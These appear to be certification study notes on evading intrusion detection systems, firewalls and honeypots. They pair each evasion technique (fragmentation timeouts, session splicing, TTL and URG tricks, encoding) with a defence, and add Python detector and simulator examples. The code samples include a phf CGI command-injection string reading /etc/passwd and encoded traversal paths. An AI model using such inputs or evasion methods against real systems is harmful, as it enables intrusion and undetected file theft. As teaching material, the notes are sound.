CEH-Module12 - Evading IDS, Firewalls, and Honeypots
Intrusion Detection System
An Intrusion Detection System (IDS) is a security tool that monitors network or system activity for malicious actions or policy violations and reports them to a management station. An IDS does not block what it detects; it only reports it. IDS come in two main types:
- Network Intrusion Detection Systems (NIDS): These monitor network traffic for patterns that may indicate an attack. They are placed at strategic points within the network, usually fed by a mirror (SPAN) port or a network tap, so that one sensor sees traffic to and from many devices.
- Host Intrusion Detection Systems (HIDS): These run on an individual host and monitor only that host: its inbound and outbound packets, plus local sources a NIDS cannot see, such as system logs and changes to critical files.
IDS use various detection methods, including signature-based detection, which looks for specific patterns or signatures of known attacks, and anomaly-based detection, which looks for deviations from normal behavior. IDS can be a standalone appliance or a software application running on a server or workstation.
Where Is IDS Placed In Network
In a computer network, an IDS is typically placed at strategic points to monitor traffic for suspicious activity or security breaches:
- Network Perimeter: An IDS can be placed at the network perimeter, where traffic enters or leaves the network, usually alongside the firewall or router that filters incoming and outgoing traffic.
- Internal Network: An IDS can also be placed within the internal network to monitor traffic between segments or devices. This helps detect lateral movement of threats that are already inside.
- Critical Points: An IDS can be deployed in front of systems where sensitive information is stored or processed, such as database servers or financial systems.
- Cloud Environments: In cloud environments, an IDS can be deployed in virtual networks or on cloud-hosted servers to monitor traffic within the cloud infrastructure.
The placement of IDS depends on the network architecture and security requirements of the organization.
How Does an IDS Detect an Intrusion?
Anomaly-based detection compares current network or system activity to a baseline of normal behavior. Here is how it typically works:
- Baseline Establishment: The IDS first establishes a baseline of normal behavior for the network or system, using metrics such as traffic volume, protocols used, typical user activities, and system performance.
- Monitoring: The IDS continuously monitors network or system activity, collecting packet headers, system logs, and other relevant data.
- Detection, using one or more of the following methods:
  - Signature Detection: Compares traffic or system activity against a database of known attack patterns (signatures). On a match the system alerts administrators or, in an IPS, blocks the traffic. This is effective against known threats but cannot detect an attack for which no signature exists yet.
  - Anomaly Detection: Looks for deviations from the established baseline and raises an alert when behavior departs from it significantly. This is effective at detecting unknown threats, but it generates false positives if the baseline is inaccurate, and an attacker who is already active while the baseline is being learned can make the attack look "normal".
  - Protocol Anomaly Detection: Checks traffic against the protocol specification (for example, an HTTP request with an illegal method or an oversized header) rather than against a behavioral baseline. This catches attacks that abuse protocol implementations even when no signature exists.
- Alerting: If the IDS detects something, it generates an alert for the system administrator or security team with details of the detection and its potential impact.
- Response: Based on the alert, the security team investigates, mitigates the threat if it is real, and updates the IDS rules or the baseline if necessary.
Anomaly-based detection is useful for detecting previously unknown or zero-day attacks that have no signature. However, it can also generate false positives if the baseline is not accurately set or if there are legitimate changes in network or system behavior.
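As an added example (not code from the original page), the following Python runs both a signature matcher and a baseline-based anomaly detector over constructed web-server log lines. The log format, the client addresses, the two signatures and the threshold of three standard deviations are assumptions made for this example. It shows what each method catches on its own: the signature finds the single exploit request hidden in normal browsing, and the anomaly detector finds a request burst that matches no signature at all.

```python
import re
import statistics
from collections import Counter

# Added example, not from the page. Constructed web-server log lines in the
# form "<HH:MM:SS> <client_ip> <method> <path> <status>". Minutes 10:00-10:03
# are ordinary browsing (with one exploit attempt hidden in it); minute 10:04
# is a constructed burst of 30 requests to /admin from one client.
SAMPLE_LOGS = [
    "10:00:01 10.0.0.5 GET /index.html 200",
    "10:00:02 10.0.0.7 GET /about.html 200",
    "10:00:03 10.0.0.5 GET /products 200",
    "10:00:04 10.0.0.9 POST /login 200",
    "10:00:05 10.0.0.7 GET /contact 200",
    "10:01:01 10.0.0.5 GET /index.html 200",
    "10:01:02 10.0.0.9 GET /news 200",
    "10:01:03 10.0.0.7 POST /login 401",
    "10:01:04 10.0.0.5 GET /products 200",
    "10:02:01 10.0.0.5 GET /index.html 200",
    "10:02:02 10.0.0.7 GET /about.html 200",
    "10:02:03 10.0.0.9 GET /news 200",
    "10:02:04 10.0.0.5 GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 404",
    "10:03:01 10.0.0.5 GET /index.html 200",
    "10:03:02 10.0.0.7 GET /news 200",
    "10:03:03 10.0.0.9 GET /about.html 200",
] + [f"10:04:{i:02d} 10.0.0.42 GET /admin 401" for i in range(1, 31)]

BASELINE_MINUTES = {"10:00", "10:01", "10:02", "10:03"}   # training window (assumed)

LOG_RE = re.compile(
    r"^(?P<minute>\d\d:\d\d):\d\d (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$"
)

# Signature-based detection: known-bad patterns, as a signature IDS would carry.
SIGNATURES = {
    "phf-cgi-exploit": re.compile(r"/cgi-bin/phf", re.I),
    "passwd-file-access": re.compile(r"/etc/passwd", re.I),
}


def parse(lines):
    """Parse log lines into dicts with keys minute, ip, method, path, status."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:                      # malformed lines are skipped, not guessed at
            events.append(m.groupdict())
    return events


def signature_alerts(events):
    """Return (minute, ip, signature_name) for every event that matches a signature."""
    alerts = []
    for e in events:
        for name, rx in SIGNATURES.items():
            if rx.search(e["path"]):
                alerts.append((e["minute"], e["ip"], name))
    return alerts


def build_baseline(events, baseline_minutes):
    """Mean and population std-dev of per-client requests-per-minute in the training window."""
    counts = Counter((e["minute"], e["ip"]) for e in events if e["minute"] in baseline_minutes)
    values = list(counts.values())
    return statistics.mean(values), statistics.pstdev(values)


def anomaly_alerts(events, baseline_minutes, k=3.0):
    """Anomaly detection: flag (minute, ip) buckets outside the baseline whose
    request count exceeds mean + k * stdev. Returns (minute, ip, count, threshold)."""
    mean, sd = build_baseline(events, baseline_minutes)
    threshold = mean + k * sd
    counts = Counter((e["minute"], e["ip"]) for e in events if e["minute"] not in baseline_minutes)
    return [(minute, ip, n, round(threshold, 2))
            for (minute, ip), n in sorted(counts.items()) if n > threshold]


if __name__ == "__main__":
    evs = parse(SAMPLE_LOGS)
    print("signature:", signature_alerts(evs))
    print("anomaly:", anomaly_alerts(evs, BASELINE_MINUTES))
```

Two things the output illustrates: the /admin burst is invisible to the signature engine and obvious to the anomaly engine, while the phf request is a single, low-volume event the anomaly engine never flags. Note also that the exploit request sits inside the training window; a real baseline built while an attacker is active absorbs that activity as "normal", which is why baselines are validated before being trusted.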
Intrusion Prevention System
An Intrusion Prevention System (IPS) monitors network or system activity for malicious actions, such as security threats or policy violations, and takes automated action to block or prevent them. An IPS builds on the capabilities of an IDS by adding the ability to actively stop detected threats. Because it must be able to drop traffic, an IPS sits inline in the traffic path, whereas an IDS usually inspects a copy of the traffic from a mirror port or tap. The trade-off is that a false positive on an IPS blocks legitimate traffic, and an inline IPS failure can take the link down with it.
Key features of an IPS include:
- Real-time Monitoring: Like an IDS, an IPS continuously monitors network or system traffic for suspicious activity.
- Threat Detection: It uses the same methods as an IDS, including signature-based and anomaly-based detection, to detect known and unknown threats.
- Automated Response: When a threat is detected, the IPS can block the offending IP address, drop the malicious packets, reset the connection, or reconfigure firewall rules.
- Alerting and Reporting: The IPS generates alerts and reports to notify administrators of detected threats and the actions taken.
- Integration with other Security Tools: IPSs are often integrated with firewalls, IDSs and log management tools to provide comprehensive coverage.
Overall, an IPS helps enhance the security of a network or system by actively preventing threats from causing harm, in addition to detecting and alerting on them.
Firewall
A firewall is a network security device (a dedicated hardware appliance) or software (Windows Defender Firewall on Windows; iptables, nftables or ufw on Linux) that monitors and controls incoming and outgoing network traffic based on predetermined security rules. It acts as a barrier between a trusted internal network and untrusted external networks, such as the internet, to prevent unauthorized access while allowing legitimate communication.
Key features of a firewall include:
- Packet Filtering: Firewalls inspect packets as they pass through and apply rules to allow or block them based on source and destination IP addresses, ports, and protocols.
- Stateful Inspection: Stateful firewalls track the state of active connections and decide based on context: an inbound packet is accepted only if it belongs to a connection the firewall has already seen being established. A stateless filter that matches on header fields alone cannot make that distinction, which is what evasions such as ACK tunneling rely on.
- Proxy Service: Some firewalls act as proxies for inbound and outbound traffic, establishing the connection with the source or destination on behalf of the client, so that no packet passes directly between the two networks.
- Network Address Translation (NAT): Firewalls can perform NAT, which hides the internal IP addresses of devices from external networks, providing a layer of privacy and security.
- Application Layer Filtering: Next-generation firewalls (NGFWs) inspect traffic at the application layer and make decisions based on the content of the data, allowing more granular control and better protection against advanced threats.
Firewalls are essential components of network security and are used in both home and enterprise environments to protect against unauthorized access, malware, and other cyber threats.
Bastion Host, Screened Subnet, Multi-Homed Firewall
Bastion Host: A bastion host is a highly secured server located on a perimeter network (DMZ) that is designed to withstand attacks. It is typically used to provide a single point of entry for access to a private network from an external network (like the internet). The bastion host is heavily secured and only allows specific types of traffic, such as SSH or HTTPS, from specific IP addresses. It acts as a gateway for traffic coming into and leaving the network.
Screened Subnet: A screened subnet, also known as a “demilitarized zone” (DMZ), is a network segment that is isolated from an organization’s internal network and is accessible from the internet. It typically contains servers that need to be accessible from the internet, such as web servers, email servers, or FTP servers. The screened subnet is protected by a firewall on each side, with the external firewall filtering incoming traffic and the internal firewall filtering traffic going to the internal network.
Multi-Homed Firewall: A multi-homed firewall is a firewall that has multiple network interfaces, each connected to a different network segment. This allows the firewall to separate and control traffic between different network segments, such as between an internal network and a DMZ. Multi-homed firewalls are often used in conjunction with bastion hosts and screened subnets to provide a layered approach to network security.
These concepts are often used together in network security architectures to create a layered defense strategy. The bastion host provides a hardened entry point into the network, the screened subnet isolates and protects servers that need to be accessible from the internet, and the multi-homed firewall controls traffic between different network segments.
What is DMZ
In networking, a Demilitarized Zone (DMZ) is a segregated network area that sits between an organization’s internal network (intranet) and an external network (typically the internet). The DMZ is a neutral zone, similar to the demilitarized zone between two countries, where military activity is prohibited.
The primary purpose of a DMZ in networking is to provide an additional layer of security by isolating external-facing services (such as web servers, email servers, or FTP servers) from the internal network. This segregation helps protect the internal network from direct exposure to external threats.
Key features of a DMZ in networking include:
- Security: The DMZ is designed to host servers that need to be accessible from the internet. Placing these servers in the DMZ helps protect the internal network from external attacks.
- Architecture: A typical DMZ setup includes one or more firewalls that control traffic between the internal network, the DMZ, and the external network. Traffic from the internet first enters the external firewall, which filters and forwards traffic to the DMZ. Another firewall separates the DMZ from the internal network, controlling and monitoring traffic between them.
- Usage: Common services hosted in a DMZ include web servers, email servers, and FTP servers. These services require a degree of external access but need to be isolated from the internal network for security reasons.
- Implementation: A DMZ can be implemented using physical network segmentation (separate physical switches) or logical segmentation (VLANs on a single physical network).
Overall, a DMZ is an important component of network security architecture, providing a buffer zone between the internet and internal networks to protect sensitive data and services from external threats.
Honeypot
In networking, a honeypot is a security mechanism used to detect, deflect, or study attempts at unauthorized use of information systems. A honeypot is essentially a decoy server or system that is set up to attract and trap potential attackers.
Key points about honeypots include:
- Purpose: Honeypots gather information about attackers' tactics, techniques, and procedures (TTPs) and lure them away from more critical systems. Because no legitimate user has any reason to touch one, any interaction with a honeypot is a high-fidelity alert, which makes honeypots a useful early warning of new or unknown threats.
- Types: Low-interaction honeypots emulate only a limited set of services and responses (for example, a banner and a login prompt); high-interaction honeypots run a real operating system or application that the attacker can fully interact with, yielding richer data at higher risk and cost.
- Deployment: Honeypots can be deployed within an organization's internal network (internal honeypots) or in the DMZ to attract external attackers (external honeypots). They can also be deployed in the cloud to detect attacks targeting cloud-based resources.
- Detection: Honeypots detect attacks by monitoring network traffic, logging interactions with the decoy system, and analyzing patterns of behavior that indicate malicious activity.
- Risks: While honeypots are valuable for detecting and studying attacks, they carry risks. If not properly isolated, an attacker who compromises one can use it as a launching pad for attacks against other systems, which is why high-interaction honeypots are placed in a separate network segment with outbound traffic restricted. Managing and monitoring honeypots also requires resources and expertise.
Overall, honeypots can be an effective component of a comprehensive network security strategy, providing valuable insights into attackers’ methods and helping organizations improve their overall security posture.
Intrusion Detection Tools: Snort
Snort is a widely used open-source Intrusion Detection System (IDS) that is capable of performing real-time traffic analysis and packet logging on IP networks. It is highly flexible and can be used for a variety of purposes, including network traffic analysis, intrusion detection, and prevention.
Key features of Snort include:
- Packet Sniffing: Snort captures and analyzes network packets as they pass through a network interface, allowing it to inspect traffic in real time.
- Signature-based Detection: Snort uses a set of pre-configured rules (signatures) to detect known threats and attacks based on patterns in network traffic.
- Protocol Analysis: Snort can analyze network protocols and detect anomalies or suspicious behavior that may indicate an attack.
- Flexible Rule Engine: Snort's rule engine is highly configurable, allowing users to create custom rules to detect specific threats or to modify existing rules to suit their needs.
- Logging and Alerting: Snort can log detected events to various output formats (e.g., text files, databases) and generate alerts to notify administrators of potential security incidents.
- Community Support: Snort has a large and active user community that provides updates, new rules, and support for users.
Overall, Snort is a powerful and versatile tool for network security that can help organizations detect and respond to a wide range of threats and attacks.
Snort Rule
A Snort rule is a set of criteria the Snort engine uses to detect specific network traffic or behavior that may indicate a security threat. Each rule is written in a fixed format and consists of two parts:
- Rule Header: The rule action, protocol, source IP address and port, direction operator, and destination IP address and port.
- Rule Options: The conditions that must be met for the rule to trigger, written in parentheses with each option terminated by a semicolon. This can include content matches, the alert message, the rule ID, and other criteria.
Here is a basic example of a Snort rule:

```
alert tcp any any -> any 80 (content:"GET"; msg:"HTTP GET request detected"; sid:100001;)
```

In this example, the rule has the following components:
- Action: alert - generate an alert when the rule matches.
- Protocol: tcp - the rule applies to TCP traffic.
- Source and Destination IP Addresses: any - the rule applies to traffic between any source and destination IP addresses.
- Source and Destination Ports: any 80 - any source port, destination port 80 (HTTP).
- Direction operator: -> - the source is on the left, the destination on the right.
- Rule Options:
  - content:"GET" - trigger if the packet payload contains the string "GET".
  - msg:"HTTP GET request detected" - the message included in the alert.
  - sid:100001 - a unique identifier for the rule. Note that Snort reserves SIDs below 1,000,000 for its official rule sets; locally written rules should use 1,000,000 and above.
When Snort detects traffic that matches this rule, it generates an alert with the specified message and SID.
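The following parser and matcher, added here as an example and not part of Snort itself, handles the subset of rule syntax used above (header with direction operator, content with nocase, msg, sid) and runs constructed packets through the rules. The two rules beyond the page's own example, the packet contents and the addresses are assumptions for this example. Real Snort additionally reassembles TCP streams before matching; this single-packet matcher does not, which is exactly the gap that session splicing exploits.

```python
import ipaddress
import re
from dataclasses import dataclass, field

# Added example, not Snort's own code. Rules are constructed for this example;
# the first is the page's example rule moved into the local SID range.
RULES_TEXT = """
alert tcp any any -> any 80 (msg:"HTTP GET request detected"; content:"GET"; sid:1000001;)
alert tcp any any -> any 80 (msg:"phf CGI access"; content:"/cgi-bin/phf"; nocase; sid:1000002;)
alert tcp !10.0.0.0/8 any -> 10.0.0.0/8 22 (msg:"SSH from outside the LAN"; sid:1000003;)
"""

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)
# One option: keyword, optional ':value' (quoted or bare), terminated by ';'.
OPTION_RE = re.compile(r'\s*(?P<key>\w+)(?::\s*(?P<val>"(?:[^"\\]|\\.)*"|[^;]*))?\s*;')


@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    dst: str
    dport: str
    msg: str = ""
    sid: int = 0
    contents: list = field(default_factory=list)   # [needle_bytes, nocase] pairs


def parse_rule(line):
    m = HEADER_RE.match(line.strip())
    if not m:
        raise ValueError(f"bad rule header: {line!r}")
    rule = Rule(*(m.group(k) for k in ("action", "proto", "src", "sport", "dst", "dport")))
    for opt in OPTION_RE.finditer(m.group("opts")):
        key, val = opt.group("key"), opt.group("val")
        if val and val.startswith('"'):
            val = val[1:-1]
        if key == "msg":
            rule.msg = val
        elif key == "sid":
            rule.sid = int(val)
        elif key == "content":
            rule.contents.append([val.encode(), False])
        elif key == "nocase" and rule.contents:
            rule.contents[-1][1] = True           # nocase modifies the preceding content
    return rule


def load_rules(text):
    return [parse_rule(l) for l in text.splitlines() if l.strip() and not l.startswith("#")]


def _addr_matches(spec, ip):
    if spec == "any":
        return True
    negate = spec.startswith("!")
    net = ipaddress.ip_network(spec.lstrip("!"), strict=False)
    return (ipaddress.ip_address(ip) in net) != negate


def _port_matches(spec, port):
    if spec == "any":
        return True
    negate = spec.startswith("!")
    return (int(spec.lstrip("!")) == port) != negate


def rule_matches(rule, pkt):
    """pkt: dict with proto, src, sport, dst, dport and payload (bytes)."""
    if rule.proto not in ("ip", pkt["proto"]):
        return False
    if not (_addr_matches(rule.src, pkt["src"]) and _port_matches(rule.sport, pkt["sport"])
            and _addr_matches(rule.dst, pkt["dst"]) and _port_matches(rule.dport, pkt["dport"])):
        return False
    for needle, nocase in rule.contents:           # every content option must match
        hay = pkt["payload"].lower() if nocase else pkt["payload"]
        if (needle.lower() if nocase else needle) not in hay:
            return False
    return True


def evaluate(rules, pkt):
    """Return [(sid, msg)] for every rule that fires on the packet."""
    return [(r.sid, r.msg) for r in rules if rule_matches(r, pkt)]
```

The bidirectional operator `<>` is accepted by the parser but treated as `->`, and only the content, msg, sid and nocase options are understood; anything else is ignored rather than rejected, which is a reasonable choice for a demonstration but not for a production rule loader.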
IDS Evasion Techniques
- Insertion Attack: The attacker sends packets that the IDS accepts but the end host rejects, for example a TCP segment with a bad checksum or a packet whose TTL expires before it reaches the host. The IDS's reconstructed stream then contains bytes the host never sees, so a signature that spans those bytes no longer matches.
- Unicode Evasion: Encoding parts of the payload, typically a URL, with alternative Unicode or UTF-8 representations, including overlong encodings, so that a signature written for the plain form does not match unless the IDS canonicalizes the data the way the target application does.
- Evasion: The mirror image of insertion: the end host accepts data that the IDS discards or misinterprets, so the attack reaches the target but the IDS never sees the complete stream. Fragmentation, obfuscation and encryption are the usual means.
- Polymorphic Shellcode: Shellcode that changes its byte pattern on every use (for example by encoding the payload and prepending a varying decoder), so that a fixed signature cannot match it.
- Fragmentation Attack: Splitting the payload across IP fragments so that no single fragment contains the signature; an IDS that does not reassemble fragments, or reassembles them differently from the host, misses the attack.
- ASCII Shellcode: Shellcode built entirely from printable ASCII bytes so that filters and signatures looking for typical binary shellcode patterns do not trigger.
- Denial-of-Service Attack: Overloading the IDS, its sensor or its logging infrastructure so that it drops packets or cannot record alerts while the real attack takes place. Many IDS deployments send alerts to a centralized log server; if an attacker learns that server's IP address, a DoS attack against it means the attack leaves no trace even if the sensor fires.
- Overlapping Fragments: Sending fragments whose offsets overlap with conflicting data. Operating systems resolve overlaps differently (some keep the data received first, others the data received last), so an IDS that applies a different policy from the target reassembles a different payload from the one the host processes.
- Application-Layer Attacks: Exploiting vulnerabilities in application protocols (such as HTTP or SMTP) in ways that look like valid protocol usage to a network-level IDS, so that only an inspector that understands the application's semantics can detect them.
- Obfuscating: Concealing the true nature of an attack by encryption, encoding, or padding the payload with meaningless data so that it no longer matches known patterns.
- Time-To-Live Attacks: Setting the IP TTL so that a packet reaches the IDS but expires before it reaches the target. The IDS counts the packet as part of the stream while the host never receives it; interleaved with normal packets, this lets the attacker feed the IDS a different stream from the one the host sees.
- Desynchronization: Causing the IDS to lose track of the TCP session state, for example with fake SYN or RST segments or segments with unexpected sequence numbers, so that its idea of which bytes belong to the stream diverges from the host's and it cannot reconstruct the attack.
- False Positive Generation: Deliberately sending traffic that triggers IDS alerts, flooding analysts with noise so that the real attack is lost among the false alarms or the alerts are ignored altogether.
- Urgency Flag: Using the TCP URG flag and urgent pointer. Some host stacks remove the urgent byte from the normal data stream; an IDS that does not model that behavior reassembles a stream containing a byte the application never sees, so the signature fails to match.
- Session Splicing: Splitting the attack string across many small TCP segments so that no single packet contains a matching signature; an IDS that inspects packets individually rather than the reassembled stream misses it.
- Encryption: Encrypting the payload (for example inside TLS or SSH) so that an IDS that cannot decrypt the traffic has nothing to match against.
- Invalid RST Packets: Sending a TCP RST with an invalid checksum. The host discards it and the connection continues, but an IDS that does not validate checksums tears down its state for the session and stops inspecting it.
- Flooding: Overwhelming the network or the IDS with a high volume of traffic so that the sensor drops packets, or so that analysts are distracted while the real attack goes through.
Most of these techniques rely on a difference between how the IDS and the end host interpret the same packets. The defense is target-based analysis: the IDS must reassemble fragments and streams the way the specific operating system behind it does, validate checksums and TTLs as the host would, and normalize encoded data the way the target application does.
Firewall Evasion Techniques
The following are some firewall bypassing techniques
- Port Scanning
- Firewalking
- Banner Grabbing
- IP Address Spoofing
- Source Routing
- Tiny Fragments
- Using an IP Address in Place of URL
- Using Anonymous Website Surfing Sites
- Using a Proxy Server
- ICMP Tunneling
- ACK Tunneling
- HTTP Tunneling
- SSH Tunneling
- DNS Tunneling
- Through External Systems
- Through MITM Attack
- Through Content
- Through XSS Attack
Obfuscation
Obfuscation is a technique used by attackers to evade firewalls and intrusion detection systems (IDS) by making their malicious traffic appear legitimate or innocuous. Firewalls and IDS systems rely on pattern matching and signature-based detection to identify and block malicious traffic. Obfuscation makes it challenging for these systems to detect and block malicious traffic, allowing attackers to bypass security controls and gain unauthorized access to a network or system.
Techniques Used in Obfuscation
- Packet Obfuscation: Modifying packet headers, payloads, or protocols to make them appear legitimate or innocuous.
- Protocol Obfuscation: Using non-standard or modified protocols to evade detection by firewalls and IDS systems.
- Data Obfuscation: Encrypting or encoding data to make it difficult for firewalls and IDS systems to inspect and analyze.
- Traffic Obfuscation: Disguising malicious traffic as legitimate traffic, such as using HTTP or HTTPS to tunnel malicious traffic.
Methods of Obfuscation
- Fragmentation: Breaking up packets into smaller fragments to evade detection by firewalls and IDS systems.
- Encryption: Encrypting data to make it difficult for firewalls and IDS systems to inspect and analyze.
- Tunneling: Using protocols such as HTTP, HTTPS, or SSH to tunnel malicious traffic through firewalls and IDS systems.
- Spoofing: Spoofing IP addresses, MAC addresses, or other identifying information to make malicious traffic appear legitimate.
Tools and Techniques Used by Attackers
- Obfuscation Tools: Obfuscators, packers and crypters transform malware so that its on-disk and in-transit byte patterns no longer match static signatures, while the decoded code behaves the same once it runs.
- Proxy Servers: Proxy servers are used to tunnel malicious traffic through firewalls and IDS systems.
- VPN: Virtual Private Networks (VPNs) are used to encrypt and tunnel malicious traffic through firewalls and IDS systems.
In conclusion, obfuscation is a powerful technique used by attackers to evade firewalls and IDS systems. Understanding the techniques and methods used by attackers is essential to developing effective countermeasures and best practices to prevent and detect obfuscated malicious traffic.
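The following Python is an added example, not code from the page: it shows why an inspector must canonicalize obfuscated input before matching a signature. A naive directory-traversal signature is applied once to the raw bytes and once after undoing the encodings a lenient web server would undo (repeated percent-decoding and overlong two-byte UTF-8). The sample paths and the signature are constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Added example, not from the page. A naive IDS signature for "../" and some
# constructed request paths that encode the same traversal in different ways.
SIGNATURE = re.compile(rb"\.\./")

SAMPLES = {
    "plain":    b"/static/../../etc/passwd",
    "percent":  b"/static/%2e%2e%2f%2e%2e%2fetc/passwd",     # ../ percent-encoded
    "double":   b"/static/%252e%252e%252fetc/passwd",        # percent-encoded twice
    "overlong": b"/static/..%c0%af..%c0%afetc/passwd",       # '/' as overlong UTF-8
    "benign":   b"/static/css/site.css",
}


def naive_match(path):
    """Signature applied to the raw bytes, as a naive IDS would."""
    return bool(SIGNATURE.search(path))


def canonicalize(path, max_rounds=3):
    """Undo the encodings a lenient web server undoes: percent-decode until the
    result stops changing (bounded, so crafted input cannot loop forever), then
    fold overlong two-byte UTF-8 sequences (0xC0/0xC1 lead bytes, invalid per
    RFC 3629 but accepted by some decoders) back to the ASCII they encode."""
    cur, rounds = path, 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(cur)
        rounds += 1
        if decoded == cur:
            break
        cur = decoded
    out = bytearray()
    i = 0
    while i < len(cur):
        b0 = cur[i]
        if b0 in (0xC0, 0xC1) and i + 1 < len(cur) and 0x80 <= cur[i + 1] <= 0xBF:
            out.append(((b0 & 0x1F) << 6) | (cur[i + 1] & 0x3F))   # 2-byte UTF-8 -> code point
            i += 2
        else:
            out.append(b0)
            i += 1
    return bytes(out)


def canonical_match(path):
    """Signature applied after canonicalization."""
    return bool(SIGNATURE.search(canonicalize(path)))


def scan(samples=SAMPLES):
    """Return {name: (naive_hit, canonical_hit)} for each sample path."""
    return {name: (naive_match(p), canonical_match(p)) for name, p in samples.items()}


if __name__ == "__main__":
    for name, hits in scan().items():
        print(f"{name:9s} naive={hits[0]!s:5s} canonical={hits[1]}")
```

Only the plain form trips the naive signature; every encoded variant is caught only after canonicalization. The caveat is that the IDS must decode the same way the target does: decoding more aggressively than the application produces false positives, and decoding less aggressively (for example, one percent-decoding round when the application does two) is precisely the gap the double-encoded sample exploits.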
Session Splicing
Session splicing is an IDS evasion technique in which the attacker splits the data of a single session, typically an HTTP request, across many small TCP segments so that no single packet contains enough of the attack string to match a signature. It defeats IDS that inspect packets individually, or whose stream reassembly gives up on sessions that arrive slowly, rather than reassembling the full stream exactly as the receiving host does. It is often combined with other evasion techniques, such as obfuscation and fragmentation.
How Session Splicing Works
- Splitting: The attacker divides the request into pieces of one or a few bytes each (for example "GE", "T /c", "gi-b", "in/p", "hf").
- Sending: The pieces are sent as separate TCP segments within the same connection, sometimes with delays between them so that an IDS with a short session timeout discards its partial copy of the stream.
- Reassembly: The target's TCP stack reassembles the segments in sequence order and hands the application the complete request; only the host sees the attack string whole.
Types of Session Splicing
- TCP-level splicing: Any TCP-based protocol can be spliced, since the split happens at the segment level and the application never notices.
- HTTP session splicing: The request line and headers are split so that the method, path and header names are spread across segments.
- FTP session splicing: FTP commands and their arguments are split across segments in the same way.
Techniques Used in Session Splicing
- Fragmentation: The same idea one layer down: splitting packets into IP fragments so that individual fragments do not match.
- Obfuscation: Encoding or encrypting the data so that even a reassembled stream does not match a signature.
- Tunneling: Carrying the spliced traffic over HTTP or HTTPS so that it passes firewalls that allow web traffic.
In conclusion, session splicing is effective against IDS that do not reassemble TCP streams faithfully. The countermeasure is stream reassembly that mirrors the target host's behavior, with session timeouts long enough that slowly sent data is not discarded.
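As an added example (not code from the page), the following Python splices a constructed attack request into three-byte TCP segments and runs three inspectors over them: one that looks at each packet alone, one that reassembles the whole stream in sequence order, and one that reassembles but flushes its buffer to the matcher every few bytes. The request, the signature and the segment sizes are assumptions for this example.

```python
import re

# Added example, not from the page. The signature and request are constructed;
# the request is the classic phf CGI exploit string used as a sample.
SIGNATURE = re.compile(rb"GET\s+/cgi-bin/phf", re.I)
ATTACK_REQUEST = b"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0\r\n\r\n"


def splice(request, chunk=3, start_seq=1000):
    """Split the request into (seq, payload) TCP segments of `chunk` bytes each."""
    return [(start_seq + i, request[i:i + chunk]) for i in range(0, len(request), chunk)]


def per_packet_alert(segments):
    """IDS that inspects each packet in isolation: True if any single payload matches."""
    return any(SIGNATURE.search(payload) for _, payload in segments)


def reassemble(segments):
    """Order segments by sequence number, as the receiving TCP stack does,
    regardless of arrival order. Stops at the first gap (no fill-in)."""
    out = bytearray()
    expected = None
    for seq, payload in sorted(segments):
        if expected is None:
            expected = seq
        if seq != expected:
            break
        out += payload
        expected += len(payload)
    return bytes(out)


def stream_alert(segments):
    """IDS that matches on the fully reassembled stream."""
    return bool(SIGNATURE.search(reassemble(segments)))


def flushing_ids_alert(segments, flush_bytes):
    """IDS that reassembles, but hands the matcher a block every `flush_bytes`
    bytes and forgets it afterwards. A signature that straddles a flush
    boundary is never seen whole."""
    buf = bytearray()
    for _, payload in sorted(segments):
        buf += payload
        if len(buf) >= flush_bytes:
            if SIGNATURE.search(buf):
                return True
            buf.clear()
    return bool(SIGNATURE.search(buf))


if __name__ == "__main__":
    segs = splice(ATTACK_REQUEST)
    print("segments:", len(segs))
    print("per-packet:", per_packet_alert(segs))
    print("stream:", stream_alert(segs))
    print("flush every 8 bytes:", flushing_ids_alert(segs, 8))
    print("flush every 64 bytes:", flushing_ids_alert(segs, 64))
```

The flushing variant is the realistic failure mode: an IDS that reassembles is not automatically safe, because the size of the window it hands to its matcher, and the timeout after which it discards a partial session, both decide whether the spliced string is ever examined in one piece.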
Fragmentation Attack
A fragmentation attack splits a malicious payload across several IP fragments so that no single fragment contains the complete signature a firewall or IDS is looking for. The fragments are reassembled by the target's IP stack, which then delivers the complete payload to the application.
Here is an example of a fragmentation attack that abuses reassembly timeouts:
Fragmentation Attack with Timeout
In this example the firewall or IDS blocks packets that match a signature, and both it and the target hold incomplete fragments in a reassembly buffer for a limited time. The evasion works because the two reassembly timeouts differ. The attacker sends the first fragment, which passes because on its own it matches nothing. It then waits longer than the inspecting device's reassembly timeout but shorter than the target host's before sending the remaining fragments.
The inspecting device has by then discarded the first fragment and never sees the whole packet; the target still holds it, completes reassembly and processes the payload.
The reverse also works: if the inspecting device keeps fragments longer than the host does, the attacker can send a decoy first fragment, wait until the host has discarded it, then send a genuine first fragment with different content followed by the rest. The device and the host then reassemble different packets.
Example Fragmentation Attack Steps:
- Attacker splits the malicious packet into fragments A, B, C and D
- Attacker sends fragment A, which matches no signature and passes the firewall/IDS
- Attacker waits until the inspecting device's reassembly timer expires (the host's has not)
- Inspecting device discards fragment A and its partial state; the host keeps it
- Attacker sends fragments B, C and D
- Host completes reassembly and processes the malicious payload; the inspecting device sees only B, C and D with no first fragment and cannot match
Individual fragments look harmless, and the delay is tuned to the inspecting device's timeout. The countermeasure is target-based reassembly: the IDS reassembles fragments using the same timeout and overlap policy as the hosts it protects (Snort's frag3 preprocessor exposes these as per-target policies), and hosts and firewalls drop fragments that cannot be reassembled within a sane time.
URG Flag
The URG flag is a bit in the TCP header that, together with the urgent pointer field, marks part of a segment's data as urgent. It is a TCP feature, not an IP fragmentation feature, although the two are usually discussed together as IDS evasions.
When URG is set, the urgent pointer indicates where the urgent data ends. Urgent data was intended for out-of-band signaling, such as interrupting a running command in Telnet. Host TCP stacks differ in how they deliver it: some hand the application the full byte stream unchanged, while others pull the urgent byte out of the normal stream and deliver it separately, so the application never sees it in sequence.
